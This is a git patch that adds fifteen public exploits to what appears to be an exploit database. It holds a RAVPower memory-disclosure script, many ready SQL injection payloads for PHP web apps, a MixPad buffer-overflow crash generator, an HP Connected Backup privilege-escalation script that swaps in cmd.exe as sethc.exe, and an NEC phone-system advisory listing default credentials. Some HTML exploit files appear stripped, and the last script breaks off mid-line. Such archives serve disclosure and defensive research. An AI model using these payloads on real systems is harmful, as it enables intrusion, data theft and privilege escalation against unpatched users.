From a02c2710c90e401517bc74ed85c2d3d6fd9a3a5e Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 24 Jan 2018 05:01:58 +0000 Subject: [PATCH] DB: 2018-01-24 15 changes to exploits/shellcodes MixPad 5.00 - Buffer Overflow RAVPower 2.000.056 - Memory Disclosure HP Connected Backup 8.6/8.8.6 - Local Privilege Escalation CentOS Web Panel 0.9.8.12 - 'row_id' / 'domain' SQL Injection NEC Univerge SV9100/SV8100 WebPro 10.0 - Configuration Download LiveCRM SaaS Cloud 1.0 - SQL Injection Affiligator 2.1.0 - SQL Injection RSVP Invitation Online 1.0 - Cross-Site Request Forgery (Update Admin) Easy Car Script 2014 - SQL Injection Wchat 1.5 - SQL Injection Zechat 1.5 - SQL Injection Tumder 2.1 - SQL Injection Photography CMS 1.0 - Cross-Site Request Forgery (Add Admin) Quickad 4.0 - SQL Injection Flexible Poll 1.2 - SQL Injection --- exploits/hardware/dos/43856.py | 49 ++++++++ exploits/multiple/webapps/43858.txt | 94 +++++++++++++++ exploits/php/webapps/43855.txt | 179 ++++++++++++++++++++++++++++ exploits/php/webapps/43860.txt | 26 ++++ exploits/php/webapps/43861.txt | 26 ++++ exploits/php/webapps/43862.html | 32 +++++ exploits/php/webapps/43863.txt | 26 ++++ exploits/php/webapps/43864.txt | 27 +++++ exploits/php/webapps/43865.txt | 27 +++++ exploits/php/webapps/43866.txt | 26 ++++ exploits/php/webapps/43867.html | 58 +++++++++ exploits/php/webapps/43868.txt | 66 ++++++++++ exploits/php/webapps/43869.txt | 29 +++++ exploits/windows/dos/43854.py | 39 ++++++ exploits/windows/local/43857.py | 78 ++++++++++++ files_exploits.csv | 15 +++ 16 files changed, 797 insertions(+) create mode 100755 exploits/hardware/dos/43856.py create mode 100644 exploits/multiple/webapps/43858.txt create mode 100644 exploits/php/webapps/43855.txt create mode 100644 exploits/php/webapps/43860.txt create mode 100644 exploits/php/webapps/43861.txt create mode 100644 exploits/php/webapps/43862.html create mode 100644 exploits/php/webapps/43863.txt create mode 100644 exploits/php/webapps/43864.txt create mode 100644 exploits/php/webapps/43865.txt create mode 100644 exploits/php/webapps/43866.txt create mode 100644 exploits/php/webapps/43867.html create mode 100644 exploits/php/webapps/43868.txt create mode 100644 exploits/php/webapps/43869.txt create mode 100755 exploits/windows/dos/43854.py create mode 100755 exploits/windows/local/43857.py diff --git a/exploits/hardware/dos/43856.py b/exploits/hardware/dos/43856.py new file mode 100755 index 000000000..e97987312 --- /dev/null +++ b/exploits/hardware/dos/43856.py @@ -0,0 +1,49 @@ +""" + +# Exploit Title: RAVPower - remote stack disclosure +# Date: 22/01/2018 +# Exploit Author: Daniele Linguaglossa +# Vendor Homepage: https://www.ravpower.com/ +# Software Link: https://www.ravpower.com/ +# Version: 2.000.056 +# Tested on: OSX +# CVE : CVE-2018-5319 + +""" + +import socket +import sys +import re + +__author__ = "Daniele Linguaglossa" + +def redall(s): + tmp = s.recv(1) + while not str(tmp).endswith(""): + tmp+=s.recv(1) + print tmp + tmp = str(tmp).split("\r\n\r\n",1)[1] + return re.sub("[\x0a]+","", tmp,100) + +def hexdump(src, length=16): + FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.' for x in range(256)]) + lines = [] + for c in xrange(0, len(src), length): + chars = src[c:c+length] + hex = ' '.join(["%02x" % ord(x) for x in chars]) + printable = ''.join(["%s" % ((ord(x) <= 127 and FILTER[ord(x)]) or '.') for x in chars]) + lines.append("%04x %-*s %s\n" % (c, length*3, hex, printable)) + return ''.join(lines) + +if __name__ == "__main__": + if len(sys.argv) == 2: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((sys.argv[1],80)) + packet = "GET /protocol.csp?fname=a&opt=%s&function=get HTTP/1.1\r\nConnection: close\r\nHost: {0}\r\n\r\n".format(sys.argv[1]) + packet = packet % ("%0a"*12241) + s.send(packet) + result = redall(s) + print "Dumping memory...\n\n" + print hexdump(result) + else: + print "Usage: {0} ".format(sys.argv[0]) \ No newline at end of file diff --git a/exploits/multiple/webapps/43858.txt b/exploits/multiple/webapps/43858.txt new file mode 100644 index 000000000..b84c51719 --- /dev/null +++ b/exploits/multiple/webapps/43858.txt @@ -0,0 +1,94 @@ +NEC Univerge SV9100/SV8100 WebPro 10.0 Remote Configuration Download + + +Vendor: NEC Corporation +Product web page: http://www.nec.com +Affected version: WebPro <=10.00 + DSP Firmware Version: 12.11.00.02 + + +Summary: NEC's UNIVERGE® SV9100 is the unified communications (UC) +solution of choice for small and medium businesses (SMBs) who don't +want to be left behind. Designed to fit your unique needs, the UNIVERGE +SV9100 platform is a powerful communications solution that provides +SMBs with the efficient, easy-to-deploy, mobile technology that they +require. + +Desc: The gzipped telephone system configuration file 'config.gz' or +'config.pcpx' that contains the unencrypted data file 'conf.pcpn', +can be downloaded by an attacker from the root directory if previously +generated by a privileged user. Attacker can also sniff the network +and hijack the session id which resides in a GET request to further +generate the config file. The sessionid can also be brute-forced +because of its predictability containing 5-digit number. This will +enable the attacker to disclose sensitive information and help her +in authentication bypass, privilege escalation, system access and +denial of service via config modification. + +Tested on: Henry/1.1 + NEC-i SV8100-NA 08.00/2.1 + NEC SV9100-GE 07.00.52/2.1 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2018-5448 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5448.php + + +11.12.2017 + +-- + + +Disclosing default credentials with weak password policy: +- - - - - - - - - - - - - - - - - - - - - - - - - - - - - + +# curl -O "http://192.168.1.1:8001/config.gz" ; gzip -d config.gz ; hexdump -C -s 0x041f220 -n 352 config + % Total % Received % Xferd Average Speed Time Time Time Current + Dload Upload Total Spent Left Speed +100 66253 100 66253 0 0 17171 0 0:00:03 0:00:03 --:--:-- 17168 +0041f220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| +* +0041f300 00 00 00 6e 65 63 69 69 20 20 20 20 20 35 38 34 |...necii 584| +0041f310 34 37 20 20 20 01 00 74 65 63 68 20 20 20 20 20 |47 ..tech | +0041f320 20 31 32 33 34 35 36 37 38 02 00 41 44 4d 49 4e | 12345678..ADMIN| +0041f330 31 20 20 20 20 30 30 30 30 20 20 20 20 03 00 41 |1 0000 ..A| +0041f340 44 4d 49 4e 32 20 20 20 20 39 39 39 39 20 20 20 |DMIN2 9999 | +0041f350 20 04 00 55 53 45 52 31 20 20 20 20 20 31 31 31 | ..USER1 111| +0041f360 31 20 20 20 20 05 00 61 74 65 6c 20 20 20 20 20 |1 ..atel | +0041f370 20 35 38 34 34 37 20 20 20 02 00 20 20 20 20 20 | 58447 .. | +0041f380 + + +Level:User:Password:Role: +- - - - - - - - - - - - - + +1:atel:58447:MAN (Manufacturer) +1:necii:47544:MAN (Manufacturer) +1:necii:58447:MAN (Manufacturer) +2:sltech:12345678:IN (Installer) +2:tech:12345678:IN (Installer) +3:ADMIN1:0000:SA (System Administrator A) +3:admin1:0000:SA (System Administrator A) +4:ADMIN2:9999:SB (System Administrator B) +4:admin2:9999:SB (System Administrator B) +4:USER1:1111:UA (User Administrator) +5:USER1:1111441:UA (User Administrator) +5:user1:1111:UA (User Administrator) + + +SAVE_CONFIG() request (Save to PC) with brute-forceable session +that will generate the config.gz / config.pcpx config file: +- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - + + + +
+ + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/43855.txt b/exploits/php/webapps/43855.txt new file mode 100644 index 000000000..4d0eac761 --- /dev/null +++ b/exploits/php/webapps/43855.txt @@ -0,0 +1,179 @@ +Document Title: +=============== +CentOS Web Panel v0.9.8.12 - Remote SQL Injection Vulnerabilities + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1833 + + +Release Date: +============= +2018-01-22 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1833 + + +Common Vulnerability Scoring System: +==================================== +7.5 + + +Vulnerability Class: +==================== +SQL Injection + + +Current Estimated Price: +======================== +4.000€ - 5.000€ + + +Product & Service Introduction: +=============================== +CentOS Web Panel - Free Web Hosting control panel is designed for quick and easy management of (Dedicated & VPS) servers without of +need to use ssh console for every little thing. There is lot's of options and features for server management in this control panel. +CWP automatically installs full LAMP on your server (apache,php, phpmyadmin, webmail, mailserver…). + +(Copy of the Homepage: http://centos-webpanel.com/features ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered a remote sql-injection web vulnerability in the CentOS Web Panel v0.9.8.12. + + +Vulnerability Disclosure Timeline: +================================== +2018-01-22: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +CWP +Product: CentOS Web Panel - (CWP) 0.9.8.12 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A remote sql-injection web vulnerability has been discovered in the official CentOS Web Panel v0.9.8.12 web-application. +The vulnerability allows remote attackers to inject own malicious sql commands to compromise the connected web-server or dbms. + +The sql-injection vulnerability is located in the `row_id` and `domain` value of the `Add a domain` module POST method request. +Remote attackers are able to manipulate the POST method request to execute own malicious sql commands on the application-side +of the web-application. The request method to inject is POST and the attack vector is application-side. The vulnerability can +be exploited by restricted user accounts against the web-application administrator. + +The security risk of the sql-injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.5. +Exploitation of the remote sql injection vulnerability requires no user interaction and only a low privileged web-application user account. +Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] Add a domain + +Vulnerable Parameter(s): +[+] row_id +[+] domain + +Affected Module(s): +[+] Delete domain + + +Proof of Concept (PoC): +======================= +The remote sql-injecton vulnerability can be exploited by remote attackers with low privilege user account and without user interaction. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Add a domain +2. Delete the same domain +3. Intercept the http request with a session tamper +4. Manipulate in the POST method request the values `row_id` or `domain` with ' +5. Continue the request and an exploitable sql-exception becomes visible +6. Now the attacker can inject to the row_id and domain to execute malicious sql commands via restricted user account +7. Successful reproduce of the sql-injection vulnerability! + + +--- SQL Error Exceptions --- +You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'test-domain'' at line 1 +Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in +/usr/local/cwpsrv/htdocs/resources/admin/include/functions.php(1) : eval()'d code(1) : eval()'d code on line 5 + + +--- PoC Session logs [POST] --- +Status: 200[OK] +POST http://cwp.localhost:2030/index.php?module=list_domains +Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] + Request Header: + Host[185.4.149.65:2030] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://cwp.localhost:2030/index.php?module=list_domains] + Cookie[cwpsrv-b66ec0f9742b8f4bd3407e0151cd756c=ae0c56ru1ver0k3d0cd1hh4147] + Connection[keep-alive] + POST-Daten: + ifpost[yes] + username[test-dom] + domain[SQL-INJECTION PAYLOAD!] + row_id[SQL-INJECTION PAYLOAD!] + Response Header: + Date[Mon, 25 Apr 2016 12:32:33 GMT] + Server[Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips PHP/5.4.27] + X-Powered-By[PHP/5.4.27] + Expires[Thu, 19 Nov 1981 08:52:00 GMT] + Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0] + Pragma[no-cache] + Keep-Alive[timeout=5, max=100] + Connection[Keep-Alive] + Transfer-Encoding[chunked] + Content-Type[text/html] + + +Reference(s): +http://cwp.localhost:2030/ +http://cwp.localhost:2030/index.php +http://cwp.localhost:2030/index.php?module=list_domains + + +Security Risk: +============== +The security risk of the remote sql-injection web vulnerability in the centos web panel application is estimated as high. (CVSS 7.5) + + +Credits & Authors: +================== +Vulnerability-Lab [research@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, +including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, +including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised +of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing +limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. \ No newline at end of file diff --git a/exploits/php/webapps/43860.txt b/exploits/php/webapps/43860.txt new file mode 100644 index 000000000..ac4506a37 --- /dev/null +++ b/exploits/php/webapps/43860.txt @@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: LiveCRM SaaS Cloud 1.0 - SQL Injection +# Dork: N/A +# Date: 23.01.2018 +# Vendor Homepage: http://livecrm.co/ +# Software Link: https://codecanyon.net/item/livecrm-saas-cloud-cloud-based-open-source-complete-business-management-solution-crm/21219419 +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-5985 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/livecrm/web/index.php?r=site/login&company_id=[SQL] +# +# %31%20%4f%52%20%31%20%47%52%4f%55%50%20%42%59%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%33%61%2c%56%45%52%53%49%4f%4e%28%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%20%48%41%56%49%4e%47%20%4d%49%4e%28%30%29%20%4f%52%20%31 +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43861.txt b/exploits/php/webapps/43861.txt new file mode 100644 index 000000000..44ebd1f92 --- /dev/null +++ b/exploits/php/webapps/43861.txt @@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: Affiligator - Affiliate Webshop Management System 2.1.0 - SQL Injection +# Dork: N/A +# Date: 23.01.2018 +# Vendor Homepage: https://www.getaffiligator.com/ +# Software Link: https://codecanyon.net/item/affiligator-affiliate-webshop-management-system/21214946 +# Version: 2.1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-5977 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/search/?q=&price_type=range&price=[SQL] +# +# %31%30%30%20%61%6e%64%28%73%65%6c%65%63%74%21%56%65%72%41%79%61%72%69%2d%7e%30%2e%20%66%72%6f%6d%28%73%65%6c%65%63%74%28%73%65%6c%65%63%74%20%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%56%65%72%73%69%6f%6e%28%29%29%29%79%29%78%29 +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43862.html b/exploits/php/webapps/43862.html new file mode 100644 index 000000000..8d7bb3e5b --- /dev/null +++ b/exploits/php/webapps/43862.html @@ -0,0 +1,32 @@ + + + +
+ + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/43863.txt b/exploits/php/webapps/43863.txt new file mode 100644 index 000000000..755af41bc --- /dev/null +++ b/exploits/php/webapps/43863.txt @@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: Easy Car Script 2014 - SQL Injection +# Dork: N/A +# Date: 23.01.2018 +# Vendor Homepage: http://www.easyphotostore.com/ +# Software Link: http://www.easycarscript.com/ +# Version: 2014 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-5986 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/site_search.php?s_vehicletype=auto&s_order=[SQL]&s_row=[SQL] +# +# %35%31%20%2f%2a%21%30%35%35%35%35%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%30%35%35%35%35%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%30%35%35%35%35%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%2c%64%61%74%61%62%61%73%65%28%29%29%29%2c%30%29%2d%2d%20%2d +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43864.txt b/exploits/php/webapps/43864.txt new file mode 100644 index 000000000..09a2cabee --- /dev/null +++ b/exploits/php/webapps/43864.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Wchat - Fully Responsive PHP AJAX Chat Script 1.5 - SQL Injection +# Dork: N/A +# Date: 23.01.2018 +# Vendor Homepage: http://bylancer.com/ +# Software Link: https://codecanyon.net/item/wchat-fully-responsive-phpajax-chat/18047319 +# Version: 1.5 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-5979 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/login.php +# +# User: ' UNION ALL SELECT 0x31,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),0x33,0x34-- XXX +# Pass: anything +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43865.txt b/exploits/php/webapps/43865.txt new file mode 100644 index 000000000..812bfa7ad --- /dev/null +++ b/exploits/php/webapps/43865.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Facebook Style Php Ajax Chat - Zechat 1.5 - SQL Injection +# Dork: N/A +# Date: 23.01.2018 +# Vendor Homepage: http://bylancer.com/ +# Software Link: https://codecanyon.net/item/facebook-style-php-ajax-chat-zechat/16491266 +# Version: 1.5 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-5978 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/login.php +# +# User: ' UNION ALL SELECT 0x31,0x32,0x33,concat(0x63)-- A +# Pass: anything +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43866.txt b/exploits/php/webapps/43866.txt new file mode 100644 index 000000000..d27495aab --- /dev/null +++ b/exploits/php/webapps/43866.txt @@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: Tumder - An Arcade Games Platform 2.1 - SQL Injection +# Dork: N/A +# Date: 23.01.2018 +# Vendor Homepage: http://sndr.co.ve/ +# Software Link: https://codecanyon.net/item/tumder-an-arcade-games-platform/18726994 +# Version: 2.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-5984 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/category/[SQL] +# +# %2d%33%20%20%2f%2a%21%30%31%31%31%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%30%31%31%31%31%41%4c%4c%2a%2f%20%2f%2a%21%30%31%31%31%31%53%45%4c%45%43%54%2a%2f%20%30%78%33%31%2c%30%78%33%32%2c%43%4f%4e%43%41%54%28%44%61%74%61%62%61%73%65%28%29%2c%56%45%52%53%49%4f%4e%28%29%2c%30%78%37%65%2c%44%41%54%41%42%41%53%45%28%29%2c%30%78%37%65%2c%55%53%45%52%28%29%29%2d%2d%20%2d +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43867.html b/exploits/php/webapps/43867.html new file mode 100644 index 000000000..681e9e226 --- /dev/null +++ b/exploits/php/webapps/43867.html @@ -0,0 +1,58 @@ + + + + +

New Admin

+
+
+ +

+ + +

+ + +

+ + +

+ + +
+
+ + + \ No newline at end of file diff --git a/exploits/php/webapps/43868.txt b/exploits/php/webapps/43868.txt new file mode 100644 index 000000000..fb2af29e9 --- /dev/null +++ b/exploits/php/webapps/43868.txt @@ -0,0 +1,66 @@ +# # # # # +# Exploit Title: Classified Ads CMS - Quickad 4.0 - SQL Injection +# Dork: N/A +# Date: 23.01.2018 +# Vendor Homepage: http://bylancer.com/ +# Software Link: https://codecanyon.net/item/quickad-classified-ads-php-script/19960675 +# Version: 4.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-5972 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/listing?keywords=[SQL]&location=All%20United%20States&placetype=country&placeid=231[SQL]&cat=[SQL]&subcat=5[SQL]&filter=&sort=Newest&Submit= +# +# ' UNION ALL SELECT NULL,CONCAT(version(),0x7e7e,database()),NULL-- gLLf +# +# Parameter: keywords (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: keywords=a%' AND 1665=1665 AND '%'='&location=All United States&placetype=country&placeid=231&cat=&subcat=5&filter=&sort=Newest&Submit= +# +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: keywords=a%' AND (SELECT 7944 FROM(SELECT COUNT(*),CONCAT(0x71706a7871,(SELECT (ELT(7944=7944,1))),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND '%'='&location=All United States&placetype=country&placeid=231&cat=&subcat=5&filter=&sort=Newest&Submit= +# +# Parameter: placeid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: keywords=a&location=All United States&placetype=country&placeid=231') AND 1976=1976 AND ('lFmx'='lFmx&cat=&subcat=5&filter=&sort=Newest&Submit= +# +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: keywords=a&location=All United States&placetype=country&placeid=231') AND (SELECT 3263 FROM(SELECT COUNT(*),CONCAT(0x71706a7871,(SELECT (ELT(3263=3263,1))),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('psTy'='psTy&cat=&subcat=5&filter=&sort=Newest&Submit= +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 31 columns +# Payload: keywords=a&location=All United States&placetype=country&placeid=231') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7871,0x465344587867724149544c5a556147787a5876737447595477725372556d4a576c786c50546d7667,0x716a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- IJTp&cat=&subcat=5&filter=&sort=Newest&Submit= +# +# Parameter: subcat (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: keywords=a&location=All United States&placetype=country&placeid=231&cat=&subcat=5') AND 7923=7923 AND ('zhKR'='zhKR&filter=&sort=Newest&Submit= +# +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: keywords=a&location=All United States&placetype=country&placeid=231&cat=&subcat=5') AND (SELECT 5797 FROM(SELECT COUNT(*),CONCAT(0x71706a7871,(SELECT (ELT(5797=5797,1))),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('SvkR'='SvkR&filter=&sort=Newest&Submit= +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 31 columns +# Payload: keywords=a&location=All United States&placetype=country&placeid=231&cat=&subcat=5') UNION ALL SELECT CONCAT(0x71706a7871,0x6d72485769576563544a7a73516f67797544477a67515556755054545146717253556e676e705a74,0x716a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- jcSO&filter=&sort=Newest&Submit= +# +# Parameter: cat (GET) +# Type: UNION query +# Title: Generic UNION query (NULL) - 3 columns +# Payload: keywords=a&location=All United States&placetype=country&placeid=231&cat=' UNION ALL SELECT NULL,CONCAT(0x71706a7871,0x786a716b7066557459416e78454b506469534c61464f6d78664e434a49506c494b7a795243554556,0x716a6b6271),NULL-- gLLf&subcat=5&filter=&sort=Newest&Submit= +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43869.txt b/exploits/php/webapps/43869.txt new file mode 100644 index 000000000..540134634 --- /dev/null +++ b/exploits/php/webapps/43869.txt @@ -0,0 +1,29 @@ +# # # # # +# Exploit Title: Flexible Poll 1.2 - SQL Injection +# Dork: N/A +# Date: 23.01.2018 +# Vendor Homepage: http://ddywpro.com/ +# Software Link: https://codecanyon.net/item/flexible-poll/4363114 +# Version: 1.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-5988 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/index.php?id=[SQL] +# +# 2) +# http://localhost/[PATH]/mobile_preview.php?id=[SQL] +# +# -714'+UniOn+SElecT+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),2,3,4,5--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/windows/dos/43854.py b/exploits/windows/dos/43854.py new file mode 100755 index 000000000..ce59985fb --- /dev/null +++ b/exploits/windows/dos/43854.py @@ -0,0 +1,39 @@ +#!/usr/bin/python + +# +# Exploit Author: bzyo +# Twitter: @bzyo_ +# Exploit Title: NCH Software MixPad v5.00 - Unicode Buffer Overflow +# Date: 21-01-2017 +# Vulnerable Software: NCH Software MixPad +# Vendor Homepage: http://www.nch.com.au/mixpad +# Version: v5.00 +# Software Link: http://www.nch.com.au/mixpad/mpsetup.exe +# Tested On: Windows XP +# +# +# PoC: generate crash.txt, options, metronome tab, paste crash.txt in 'choose a custom metronome sound' +# +# no unicode jmp/call to esp +# +# EAX 00117700 +# ECX 001167F0 +# EDX 7C90E514 ntdll.KiFastSystemCallRet +# EBX 00000000 +# ESP 00116C40 UNICODE "BBBBBB does not exist or cannot be accessed." +# EBP 00116FAC +# ESI 0000004E +# EDI 00117740 +# EIP 00CC00CC + +filename="crash.txt" + +junk = "A"*251 +eip = "\xcc"*2 #eip over; jmp/call esp goes here +fill = "B"*100 #only 6 used in esp +buffer = junk + eip + fill + + +textfile = open(filename , 'w') +textfile.write(buffer) +textfile.close() \ No newline at end of file diff --git a/exploits/windows/local/43857.py b/exploits/windows/local/43857.py new file mode 100755 index 000000000..89c5cf140 --- /dev/null +++ b/exploits/windows/local/43857.py @@ -0,0 +1,78 @@ +#Tested on HP Connected Backup version 8.8.2.0 on Windows 7 x64 + +import os +import sys +import time +import requests +from bs4 import BeautifulSoup + +def send_request(body): + url="http://localhost:16386/" + headers = {"Content-Type": "text/xml; charset=utf-8", 'SOAPAction': '""', "Set-Cookie": "CCSessionID=SessionID11"} + response = requests.post(url, data=body, headers=headers) + if response.status_code != requests.codes.ok: + print "Non-200 response. Exiting..." + sys.exit() + else: + return response.text + + +def get_tdate(response): + soup = BeautifulSoup(response, "html.parser") + tdate = soup.findAll("m-tdate")[0].string + return tdate + +#Copy cmd.exe to world-writeable folder +print "HP Connected Backup Privilege Escalation by Peter Lapp(lappsec)" +print "Copying cmd.exe to C:\\hpcb-privesc" +os.system("mkdir C:\\hpcb-privesc") +os.system("copy C:\\Windows\\system32\\cmd.exe C:\\hpcb-privesc\\sethc.exe") + +print "Creating backup for C:\\hpcb-privesc\\sethc.exe" + +#StartScan required before IncludeFile request will be accepted +send_request("""""") + +time.sleep(3) + +#Add file to backup +send_request("""QzpcaHBjYi1wcml2ZXNjXHNldGhjLmV4ZQ==true""") + + +print "Initiating Backup" +#Start backup + +send_request("""""") + +print """Sleeping for 300 seconds to give time for backup to complete. +If the script fails after this then change the sleep period to give the backup enough time to complete""" + +time.sleep(300) + +print "Initiating restore" +#PrepareRetrieve requires valid PID of process running as SYSTEM. PID 456 is common for Windows 7 but if it fails, try another + +send_request("""456""") + +#We have to get the m-TDate value for the file in order for the restore to work correctly +print "Getting m-TDate value" +fileinfo = send_request("""QzpcaHBjYi1wcml2ZXNjXA==""") +tdate = get_tdate(fileinfo) + +print 